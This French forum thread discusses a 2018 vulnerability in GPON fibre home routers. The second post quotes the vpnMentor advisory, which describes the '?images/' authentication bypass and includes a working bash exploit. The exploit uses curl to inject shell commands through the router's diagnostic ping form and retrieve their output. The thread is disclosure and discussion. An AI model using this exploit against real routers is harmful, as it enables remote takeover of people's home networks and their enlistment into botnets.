Auteur Sujet: Faille de sécurité routeur gpon?  (Lu 4200 fois)

0 Membres et 1 Invité sur ce sujet

Optrolight

  • Client Orange Fibre
  • Modérateur
  • *
  • Messages: 4 673
  • Grenoble (38) @Optrolight
    • Optroastro
Faille de sécurité routeur gpon?
« le: 04 mai 2018 à 07:58:49 »
VPNMentor a récemment indiqué avoir mis le doigt sur une faille de grande ampleur qui toucherait plus d'un million de routeurs GPON à travers le monde. La vulnérabilité permettrait ainsi à des attaquants de prendre le contrôle de l'appareil à distance et d'organiser un botnet  conséquent capable de mener des attaques DDOS de grande envergure.

La faille est d'autant plus grave qu'elle est facile à exploiter : il suffirait d'ajouter "?images/" à la fin des URL utilisées pour accéder aux routeurs et contourner ainsi le système d'authentification. Par ailleurs, les attaquants pourraient également exploiter les fonctions de Ping et Traceroute pour exécuter du code sur la machine cible.

Seuls les routeurs équipés d'une connectivité GPON (fibre optique principalement) sont concernés. Ces routeurs sont principalement exploités par la fibre de Google. Ce sont également majoritairement les routeurs conçus par Dasan Networks qui sont concernés par la faille, même si on la constate sur les terminaux d'autres constructeurs.

Ce type de faille est doublement problématique : outre l'utilisation du matériel pour créer un botnet, les routeurs se présentent comme des portes d'entrée vers les réseaux domestiques et peuvent ainsi permettre l'organisation d'attaques ciblant les données personnelles.




Source: https://www.generation-nt.com/fibre-optique-1-million-routeurs-vulnerables-actualite-1953511.html

Thornhill

  • Abonné SFR fibre FttH
  • *
  • Messages: 3 976
  • Saint-Médard-en-Jalles (33)
Faille de sécurité routeur gpon?
« Réponse #1 le: 04 mai 2018 à 11:23:01 »
"routeurs GPON" => ça parle de box chez les particuliers si je comprends bien l'article source, donc pas de quoi en faire un fromage, d'autant que dans la plupart des cas l'interface n'est accessible que depuis le réseau local du client.
On a déjà vu des failles de ce type par le passé sur des box ou des ONT non ?

https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/



Overview:

We conducted a comprehensive assessment on a number of GPON home routers. Many routers today use GPON internet, and we found a way to bypass all authentication on the devices (CVE-2018-10561). With this authentication bypass, we were also able to unveil another command injection vulnerability (CVE-2018-10562) and execute commands on the device.
Exploitation:

During our analysis of GPON firmwares, we found two different critical vulnerabilities (CVE-2018-10561 & CVE-2018-10562)  that could, when combined allow complete control on the device and therefore the network. The first vulnerability exploits the authentication mechanism of the device that has a flaw. This flaw allows any attacker to bypass all authentication.

The flaw can be found with the HTTP servers, which check for specific paths when authenticating. This allows the attacker to bypass authentication on any endpoint using a simple trick.

By appending ?images/ to the URL, the attacker can bypass the endpoint.

This works on both HTML pages and GponForm/

For instance, by inserting

/menu.html?images/
or
/GponForm/diag_FORM?images/

we can manage the device.

While looking through the device functionalities, we noticed the diagnostic endpoint contained the ping and traceroute commands. It didn’t take much to figure out that the commands can be injected by the host parameter.

Since the router saves ping results in /tmp and transmits it to the user when the user revisits /diag.html, it’s quite simple to execute commands and retrieve their output with the authentication bypass vulnerability.

We include the following bash version of the exploit code:
#!/bin/bash

echo “
  • Sending the Command… “

# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d “XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0” $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo “
  • Waiting….”

sleep 3
echo “
  • Retrieving the ouput….”

curl -k $1/diag.html?images/ 2>/dev/null | grep ‘diag_result = ‘ | sed -e ‘s/\\n/\n/g’

Impact:

GPON is a type of passive optical network that uses fiber-optics and is particularly popular. When people use GPON, the routers are provided by ISPs. In the video, you can see that over one million people use this type of network system router.

We tested this vulnerability on many random GPON routers, and the vulnerability was found on all of them. Because so many people use these types of routers, this vulnerability can result in an entire network compromise.
Recommendations:

    Check if your router uses the GPON network.
    Be aware that GPON routers can be hacked and exploited.
    Talk to your ISP to see what they can do to fix the bug.
    Warn your friends on Facebook (click here to share) and Twitter (click here to tweet).